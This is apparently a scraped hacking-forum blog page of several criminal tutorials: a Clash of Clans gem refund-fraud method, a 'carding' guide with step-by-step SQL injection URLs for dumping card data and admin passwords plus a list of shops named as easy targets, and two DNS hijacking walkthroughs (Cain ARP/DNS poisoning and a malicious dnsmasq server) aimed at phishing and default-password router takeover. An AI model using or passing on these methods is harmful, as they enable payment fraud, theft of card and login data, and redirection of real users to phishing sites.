Clash of Clans GEM HACK!

CLASH OF CLANS GEM HACK!

*FILIPINO LANGUAGE FOR FURTHER INFORMATION*

COC REFUND GEM METHOD [POSTPAID SIM CARD ONLY GLOBE/SMART/SUN] [CREDIT CARD SAME LANG SIYA DITO] Requirments: Android Phone Postpaid SIM or CREDIT CARD/GIFT CARD/DEBIT CARD COC account Google Account must be 3months old above Computer modded google play store (Optional) Note: Ayan lang ang mga requirments kung hindi ka pasok sa requirments wag na mag tanong KICK NALANG AGAD Note: Refer po naten si admin Warley para sa modded GP para maging busy naman siya

1.Insert naten si postpaid SIM sa SIM1 para makasigurado tayo please remove the other sim card postpaid sim muna naten ang ilagay sa ating android phones 

2.Open naten si Computer at pumunta tayo sa https://play.google.com/store/account gamit ang ating munting browser at mag log in gamit ang gmail ng coc na gngmit nio

 3.mag Open ng new TAB at pumunta naman tayo dito www.wallet.google.com pumunta sa TRANSACTION METHOD at i remove ang mga payment method kung wala ka pang previous payment method SKIP mo na to

4.Standby muna naten si computer sa website na binigay ko at dumako naman tayo sa ating mahiwagang android phone i OPEN naten si COC at pumunta sa SHOP>Treasure>at piliin lamang ang 500gems mag fill up ng form na kinakailangan make sure na tugma ang postal code mo sa location mo ang trick dito make sure na makapag fill up kau within 20 secs then buy muna ang 500gems

5.pag nakita na ang PURCHASE SUCCESSFUL balikan si computer at i reload is https://play.google.com/store/account lalabas ngayon si COC jan sa transaction orders pindutin ang 3dots at i click and REPORT A PROBLEM

6.lalabas ang option at piliin si REQUEST A REFUND at gumawa ng simpleng dahilan kung bakit gusto mo mag refund (ex. i accidentally hit this purchase and my parents dont want this billing)

7.Hit SUBMIT at meron ngayong dadating email sau na nag request for cancelation ka pag natangap mo na ang message mag request ulit ng REFUND same sa dahilan mo kanina at makaka tangap ka nmn ng new message na naibalik na ang pera sayo DO THIS continuously  

(c) Symbianize 2015

Read more

HOW TO CARD?

HOW TO CARDING?

How to start Carding ?


1.OK ,u must have a CC ,Paypal dll !!

2.Find Website cardable so your orders easy to shipped !!

3.Learn about methode to buy product in every website *ex: use shock or vpn

4.Learn about dork .. to search website error so u can scan and easy to find CC or paypal in colums tables from website error.
ex :
http://www.labelpal.co.za/products.php?catid=7'
http://www.worldofbrass.com/products.php?catID=18'

Ok and Then how to scan database in every website ?
http://safetpet.com/product.php?pid=5'

=====================================================



2.Or to be perfect u can scan with manual Injection ! with command order by ,union ,group concat ,or version and etc ! <-easy ?
1.u can use Havij to scan website error ! search it in google <- for newbie . it easy !


3.Sqlmap ! search it google dude ! <-medium


-> www.site.com/news.php?id=32+union+select+1,2,3,4--
4.With SHELL but u must know username and password website admin

ex sql injection to be find username admin and password :

-> www.site.com/news.php?id=32+order+by+1--



-> www.site.com/news.php?id=32+union+select+1,2,version(),4--
-> www.site.com/news.php?id=32+order+by+2--

-> www.site.com/news.php?id=32+order+by+3--

-> www.site.com/news.php?id=32+order+by+4-- <--- find error so



-> www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
-> www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--


-> www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--


if password is MD5 u can crack it at crack md5 online
->www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

ok FINISH !! use username at www.site.com/admin/
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/ etc.


CARDING DORKS: DORKS 2015
=================================================================

http://www.footballfanatics.com/
Method : Very Easy , WorldWide , Bill=Ship
ScreenShot : http://prntscr.com/252eya

~>http://www.teefury.com/
Method : Very Easy , WorldWide , Bill=Ship
ScreenShot : http://prntscr.com/2dghli

https://store.wizkhalifa.com
Method: Billing = Shipping .... Non VBV SITE

http://www.boohoo.com/


=====================================================================================
Sport Earphones:
Web: https://yurbuds.com/
Method: Ship+Bill same / WorldWide cc


http://www.olympus.com/

method :
bill = ship
==================================================================

ex:inurl:buy.php?category= intext:ERROR - Invalid query string (PHP CODE ERROR)

Read more

DNS POISONING USING CAIN

DNS POISONING USING CAIN

Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)
DOWNLOAD CAIN: LINK

First What is the DNS ?: Wikipedia 

The Domain Name System (DNS) is a hierarchical naming system for

computers, services, or any resource connected to the internet or a

private network. It associates various information with domain names

assigned to each of the participants. Most importantly, it translates

domain names meaningful to humans into the numerical (binary)

identifiers associated with networking equipment for the purpose of

locating and addressing these devices worldwide. An often used analogy

to explain the Domain Name System is that it serves as the "phone book"

for the Internet by translating human-friendly computer hostnames into

IP addresses. For example, http://www.example.com translates to 208.77.188.166.

What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.

First This is the structure of the network :http://farm5.static.flickr.com/4044/4337060175_5b99b48ac0.jpg (EXAMPLE ONLY)

1 , 2 and 3 are computers

1 is the computer being the gateway (could be a router) (172.128.254.1)

2 is the target computer (172.128.254.10)

3 is the attacker using cain

Note : IPs are just used for this tutorial and chosen randomly.

Our work is on computer number 3.

1-After you install cain , open it and go to the sniffer tab

2-Click on configure and choose your adapterDemo :http://farm5.static.flickr.com/4032/4336895163_134d4202fd.jpg

3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)

4-Right click in the empty area and choose scan MAC addresses. We get the results above.

5-Click on the APR Tab

Demo : http://farm3.static.flickr.com/2725/4337645862_9e847b91e4.jpg

6-Click on the + sign in the toolbar to add a new ARP poison routing.

demo : http://farm5.static.flickr.com/4062/4337656172_57b3d5b3b5.jpg

7-choose the gateway which is 172.128.254.1 , in the next list you’ll

get the IP of the computer 2 which is 172.128.254.10 and click ok.

demo : http://farm5.static.flickr.com/4009/4337049117_87315e8629.jpg

8-now click on the APR-DNS tab

demo: http://farm5.static.flickr.com/4029/4337796362_14af553609.jpg

9-click on the + sign

10-enter the web address that you want to spoof , (in this case when the

user goes to facebook he’ll be redirected to myspace) click on resolve

type the web address that you want to redirect the user to it, and click

ok, and you’ll get the IP of the web address, then click ok.

demo : http://farm3.static.flickr.com/2731/4337798910_e83774f149.jpg

you'll get something like this:http://farm5.static.flickr.com/4003/4337057395_171642d13d.jpg

11-now to make this work we have to enable APR poisoning , click on the

icon next to the sniffer icon, and everything should work as we expect.

Now the computer 2 will get the routes poisoned and when the user requestshttp://www.facebook.com he will be redirected to http://www.myspace.com .(you can change myspace.com to ur phishing website)

Imagine what you can do with this technique.

Read more

DNS Hacking/Hijacking

WELCOME TO PHILIPPINE HACKING UNIVERSITY

BLOG

WE WILL TEACH YOU HOW TO HACK DNS :)

Why DNS?

The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.

If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.

Malicious DNS Server

So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.

The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)

To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.

Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)

sudo gedit /etc/dnsmasq.conf

The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof

The format for this is address=/HOST/IP

So for example;

address=/facebook.com/63.63.63.63

where 63.63.63.63 is the IP of your malicious web server

Save the file and restart dnsmasq by running

sudo /etc/init.d/dnsmasq restart

You now have a DNS server running which will redirect requests for facebook.comto 63.63.63.63

Malicious Web Server

You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.

There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site

I’ll presume you know how to do that though

Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.

I Can Be Your DNS Server Plz?

An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that

But how do you get a victim? Well this is where my project, the IP Experiment could come in handy

If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.

(Credits goes to:Hacking University (BANGLADESH) )

JOIN TO OUR GROUP FOR MORE TUTORIALS!: PHILIPPINE HACKING UNIVERSITY 

Read more